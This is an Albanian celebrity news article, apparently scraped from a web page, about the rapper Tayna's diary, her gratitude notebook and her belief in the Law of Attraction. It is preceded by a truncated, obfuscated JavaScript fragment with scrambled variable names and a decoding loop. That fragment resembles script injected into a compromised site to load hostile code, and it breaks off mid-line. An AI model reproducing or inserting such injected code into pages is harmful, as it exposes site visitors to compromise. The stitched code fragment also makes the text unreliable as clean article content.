;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ky është ditari dhe fletorja e ‘mirënjohjes’ që mban Tayna

By

Kur flasim për industrinë e muzikës moderne shqiptare, na vie në mendje gjithnjë Tayna dhe suksesi i menjëhershëm që korri. Kur flasim për sukses të menjëhershëm nënkuptojmë mënyra se si ajo arriti të bëhej e famshme shumë shpejtë që me publikimin e këngës ‘Columbiana’ – sepse sipas Tayna-s suksesi nuk u arrit brenda natës, por ishte një rrugë e gjatë dhe punë e lodhshme.

Dorintina Shabani apo Tayna, në nëntor të vitit 2018 në Nd’rrimin e Natës, ka rrëfyer një tjetër pjesë të sajën. Reperja e famshme, ka folur për Ligjin e Tërheqjes – një ligj sipas saj universal që të ndihmon të jetosh në pozitivitet dhe t’i realizosh synimet që ke në jetë.

“Unë mbaja një ditar dhe kam shkruar se si dua të jem, e kam vizuelizuar veten të famshme dhe kështu siç jam tani”, ka thënë këngëtarja.

Ndiqeni të plotë deklaratën në linkun më poshtë:

Edhe pasi arriti të ketë sukses, Tayna ende vazhdon të praktikojë të njëjtar gjëra – ajo vazhdon të mbajë ditarin e saj.

Në një postim në Instagram ajo shkruan: “Ky është ditari im, i cili më ndihmon ta kuptoj veten time. Ky është sikur shoku im i ngushtë.” pastaj vazhdon me shaka “Ndosha duhet ta publikoj pas 20 vitesh ose më shumë dhe ta shes.”

Ditari nuk është i vetmi libër shënimesh personal që mban Tayna. Ajo po ashtu mban një libër shënimesh ku shkruan për gjithçka është mirënjohëse ajo, dhe këtë gjë ka mbi dy vitë që e praktikon.

“Kjo është ‘fletorja e mirënjohjes’ ku shkruaj gjithçka për të cilën jam mirënjohëse cdo ditë. Kanë kaluar dy vite prej kur kam filluar dhe më ndihmon të shoh jetën në një mënyrë më pozitive. Ka shumë gjëra për të cilat mund të jesh falënderuese në jetë, qoftë edhe vetë frymëmarrja. Kur fokusoheni në gjërat që i ke në jetë, të ndihmon të jesh më i/e lumtur, dhe tërheq edhe më shumë gjëra që të bëjnë të ndihesh mirë.” /Prive.al

 

 

 

Artikuj të ngjashëm